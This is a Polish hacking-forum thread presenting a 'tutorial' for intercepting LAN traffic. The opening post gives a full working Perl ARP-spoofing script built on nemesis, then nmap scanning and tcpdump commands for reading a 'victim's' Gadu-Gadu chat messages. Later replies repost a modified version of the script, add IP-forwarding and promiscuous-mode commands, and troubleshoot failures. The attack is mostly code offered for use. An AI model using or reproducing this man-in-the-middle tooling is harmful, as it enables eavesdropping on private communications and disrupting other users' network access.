|
| Autor |
Wiadomość |
haker512
Administrator
Dołączył: 07 Lut 2007
Posty: 58
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
Skąd: Kłodawa
|
|
 Przechwytywanie informacji w sieciach LAN - tutorial |
|
potrzebne:
-Linux 
-bibliotek Libnet 1.0.2a
-program Nemesis
-biblioteka Libpcap
-nmap
skrypt potrzebnego nam programu napisanego w perl:
 |  | #!/usr/bin/perl
$gateway = shift;
$target = shift;
$time = shift;
$device = shift;
$i = 1;
$SIG{INT} = \&quit;
# Sprawdz poprawnosc argumentow przed startem
if ($gateway!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
{
die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}
if ($target!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
{
die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}
if ($time=~/^$/)
{
$time = 10;
print("[-] Interwal nieznany, przyjmuje 10 sekund.\n");
}
if ($time!~/^[0-9]+$/)
{
die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}
if ($device=~/^$/)
{
$device = "eth0";
print("[-] Interfejs nieznany, przyjmuje eth0.\n");
}
# Odczytaj adresy MAC bramy i celu
print ("[+] Wysylam zadanie echa do $gateway.\n");
system("ping -c 1 -w 1 $gateway 2>&1 > /dev/null");
print ("[+] Wysylam zadanie echa do $target.\n");
system("ping -c 1 -w 1 $target 2>&1 > /dev/null");
# Pakiety wyslano, mozemy odczytac adresy MAC
print "[+] Odczytuje adresy MAC z pamieci podrecznej ARP.\n";
$gateway_mac = qx[arp -na $gateway];
$gateway_mac = substr($gateway_mac, index($gateway_mac, ":")-2, 17);
$target_mac = qx[arp -na $target];
$target_mac = substr($target_mac, index($target_mac, ":")-2, 17);
# Sprawdz czy odczytane adresy MAC sa poprawne
if($gateway_mac!~/^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/)
{
die("[!] Nie moglem odczytac adresu MAC dla $gateway.");
}
if($target_mac!~/^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/)
{
die("[!] Nie moglem odczytac adresu MAC dla $target.");
}
# Odczytaj wlasny adres IP oraz MAC
print "[+] Odczytuje wlasny adres IP oraz MAC, wykorzystujac ifconfig.\n";
@ifconf = split(" ", qx[ifconfig $device]);
$you = substr(@ifconf[6],5);
$you_mac = $ifconf[4];
print "[+] Interwal wysylania pakietow to $time sekund.\n\n";
print "-> Ty: $you [$you_mac]\n";
print "-> Cel: $target [$target_mac]\n";
print "-> Brama: $gateway [$gateway_mac]\n\n";
# Wysylamy pakiety ARP
while($i)
{
print "[+] Wysylam pakiet ARP: Powiedz $target, ze $gateway jest osiagalny pod $you_mac\n";
system("nemesis arp -r -d $device -S $gateway -D $target -h $you_mac -m $target_mac -H $you_mac -M $target_mac 2>&1 > /dev/null");
print "[+] Wysylam pakiet ARP: Powiedz $gateway, ze $target jest osiagalny pod $you_mac\n";
system("nemesis arp -r -d $device -S $target -D $gateway -h $you_mac -m $gateway_mac -H $you_mac -M $gateway_mac 2>&1 > /dev/null");
sleep $time;
}
# Wcisnieto ctrl+c, przywracamy oryginalne ustawienia
sub quit
{
$i = 0;
print "[-] Koniec programu. Przywracanie oryginalnych ustawien ARP.\n";
system("nemesis arp -r -d $device -S $gateway -D $target -h $gateway_mac -m $target_mac -H $gateway_mac -M $target_mac 2>&1 > /dev/null");
system("nemesis arp -r -d $device -S $target -D $gateway -h $target_mac -m $gateway_mac -H $target_mac -M $gateway_mac 2>&1 > /dev/null");
} |
sposób używania:
| | ./arp.pl <adres bramy> <adres ofiary> <interwał> <interfejs> |
nadajemy programowi prawa wykonywalności:
| | chmod +x arp.pl |
aby znaleźć aktywne komputery w sieci używamy programu nmap:
| | nmap -sP 192.168.1.* |
na jednej konsoli wpisujemy:
| |
tcpdump 'ip host <adres IP>' np. tcpdump 'ip host 192.168.1.11' |
na drukiej konsoli zaś uruchamiamy skrypt arp.pl:
| | ./arp.pl 192.168.1.3 192.168.1.11 (np.) |
Aby podsłuchiwać rozmowy gadu-gadu na pierwszej konsoli wpisujemy:
| | tcpdump -l -X `port 8074 && host 192.168.1.11` |
a na drugiej uruchamiamy nasz skrypt:
| | ./arp.pl 192.168.1.3 192.168.1.11 |
Jako wynik powinniśmy otrzymać dośćczytelne wiadomości :]
i to by było na tyle  życzę miłej nauki.I przypominam o różnicy pomiędzy hackingiem a crackingiem
Post został pochwalony 0 razy
|
|
| Śro 19:54, 07 Lut 2007 |
 |
|
|
|
 |
Marthin
Lamer
Dołączył: 07 Lut 2007
Posty: 3
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
Skąd: Kłodawa
|
|
| |
|
Ciekawie przedstawione, ale narazie nie mam Linuxa 
Post został pochwalony 0 razy
|
|
| Pią 20:56, 09 Lut 2007 |
|
|
sharq
Lamer
Dołączył: 13 Lip 2007
Posty: 1
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
|
|
| |
|
Witam,
wielkie dzięki.. Próbowałem ją na innym systemie (jakiś slax) i było dobrze. Obecnie chcę trochę pomieszać spod SUSE, wszystko zainstalowane więc:
| | ifconfig eth0 promisc |
| | echo "1" > /proc/sys/net/ipv4/ip_forward |
| | ./arp.pl <brama> <ofiara> |
I skrypt zaczyna pracę. Działa niby prawidłowo, żadnych błędów nie wyrzuca, można zacząć sniffowanie, ale... Pakiety kierowane od ofiary do bramy odbieram bez problemu, jednak żadnej odpowiedzi na nie nie ma. Ofiara traci połączenie z netem :/
Chociaż się nie znam, wydaje mi się, że przyczyną może być ip_forward, spróbowałem ustawić forwardowanie jako default (W /etc/sysconfig/sysctl przestawiłem IP_FORWARD="no" na IP_FORWARD="yes" zresetowałem kompa ale problem pozostaje. Siedzę nad tym cały dzień i pomysłów brak...
Byłbym rly wdzięczny za jakąkolwiek pomoc...
Pozdro
PS. Probowalem przez arpspoofa i nadal to samo :/
Post został pochwalony 0 razy
|
|
| Pią 19:01, 13 Lip 2007 |
|
|
haker1243
Lamer
Dołączył: 25 Paź 2009
Posty: 4
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
|
|
| |
|
mam prośbe dasz mi link do programu nemesis do biblioteki libnet i do biblioteki libpcap prosze bym był bardz wdzięczny a nmap mam na kompie list skierowany do adma haker 512
Post został pochwalony 0 razy
|
|
| Nie 22:06, 25 Paź 2009 |
|
|
bestia
Lamer
Dołączył: 15 Lis 2009
Posty: 1
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
Skąd: Rydułtowy
|
|
| |
|
Witam,
mam trohe zmodyfikowany program arp.pl
| |
#!/usr/bin/perl
$gateway = shift;
$target = shift;
$time = shift;
$device = shift;
$i = 1;
$SIG{INT} = \&quit;
# Sprawdz poprawnosc argumentow przed startem
if ($gateway!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
{
die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}
if ($target!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
{
die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}
if ($time=~/^$/)
{
$time = 10;
print("[-] Interwal nieznany, przyjmuje 10 sekund.\n");
}
if ($time!~/^[0-9]+$/)
{
die("Uzycie: ./arp.pl IP_Bramy IP_Celu Interwal Interfejs\n");
}
if ($device=~/^$/)
{
$device = "wlan0";
print("[-] Interfejs nieznany, przyjmuje wlan0.\n");
}
# Odczytaj adresy MAC bramy i celu
print ("[+] Wysylam zadanie echa do $gateway.\n");
system("ping -c 1 -w 1 $gateway 2>&1 > /dev/null");
print ("[+] Wysylam zadanie echa do $target.\n");
system("ping -c 1 -w 1 $target 2>&1 > /dev/null");
# Pakiety wyslano, mozemy odczytac adresy MAC
print "[+] Odczytuje adresy MAC z pamieci podrecznej ARP.\n";
$gateway_mac = qx[arp -na $gateway];
$gateway_mac = substr($gateway_mac, index($gateway_mac, ":")-2, 17);
$target_mac = qx[arp -na $target];
$target_mac = substr($target_mac, index($target_mac, ":")-2, 17);
# Sprawdz czy odczytane adresy MAC sa poprawne
if($gateway_mac!~/^([a-f0-9]{2}\:){5}[a-f0-9]{2}$/)
{
die("[!] Nie moglem odczytac adresu MAC dla $gateway.");
}
if($target_mac!~/^([a-f0-9]{2}\:){5}[a-f0-9]{2}$/)
{
die("[!] Nie moglem odczytac adresu MAC dla $target.");
}
# Odczytaj wlasny adres IP oraz MAC
print "[+] Odczytuje wlasny adres IP oraz MAC, wykorzystujac ifconfig.\n";
@ifconf = split(" ", qx[ifconfig $device]);
$you = substr(@ifconf[6],5);
$you_mac = $ifconf[4];
print "[+] Interwal wysylania pakietow to $time sekund.\n\n";
print "-> Ty: $you [$you_mac]\n";
print "-> Cel: $target [$target_mac]\n";
print "-> Brama: $gateway [$gateway_mac]\n\n";
# Wysylamy pakiety ARP
while($i)
{
print "[+] Wysylam pakiet ARP: Powiedz $target, ze $gateway jest osiagalny pod $you_mac\n";
system("nemesis arp -r -d $device -S $gateway -D $target -h $you_mac -m $target_mac -H $you_mac -M $target_mac 2>&1 > /dev/null");
print "[+] Wysylam pakiet ARP: Powiedz $gateway, ze $target jest osiagalny pod $you_mac\n";
system("nemesis arp -r -d $device -S $target -D $gateway -h $you_mac -m $gateway_mac -H $you_mac -M $gateway_mac 2>&1 > /dev/null");
sleep $time;
}
# Wcisnieto ctrl+c, przywracamy oryginalne ustawienia
sub quit
{
$i = 0;
print "[-] Koniec programu. Przywracanie oryginalnych ustawien ARP.\n";
system("nemesis arp -r -d $device -S $gateway -D $target -h $gateway_mac -m $target_mac -H $gateway_mac -M $target_mac 2>&1 > /dev/null");
system("nemesis arp -r -d $device -S $target -D $gateway -h $target_mac -m $gateway_mac -H $target_mac -M $gateway_mac 2>&1 > /dev/null");
}
|
program odpalam:
| |
./arp.pl 192.168.2.78 192.168.2.11 10 wlan0
|
i zwraca mi:
| |
[+] Wysylam zadanie echa do 192.168.2.78.
[+] Wysylam zadanie echa do 192.168.2.11.
[+] Odczytuje adresy MAC z pamieci podrecznej ARP.
[!] Nie moglem odczytac adresu MAC dla 192.168.2.78. at ./arp.pl line 65.
|
Ma ktoś pomysł jak rozwiązać??
Post został pochwalony 0 razy
|
|
| Nie 21:52, 15 Lis 2009 |
|
|
palkarz_85
Lamer
Dołączył: 22 Lut 2010
Posty: 1
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
|
|
| |
|
U mnie jest to samo na Ubuntu 9.04 i 9.10. Co może być tego powodem. Pamiętam że wersji 8 działało chyba.
Post został pochwalony 0 razy
|
|
| Pon 12:44, 22 Lut 2010 |
|
|
hejman12
Lamer
Dołączył: 26 Paź 2010
Posty: 1
Przeczytał: 0 tematów
Ostrzeżeń: 0/5
|
|
| |
|
a jak mam uruchomic skrypt arp.pl bo jak wpisuje w terminal to wyskakuje mi file no such of directory POMOCY a tgw to skrypt zapisalem z końcówką .pl na pulpicie
Post został pochwalony 0 razy
|
|
| Wto 19:37, 26 Paź 2010 |
|
|
|
|
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
|
|
|
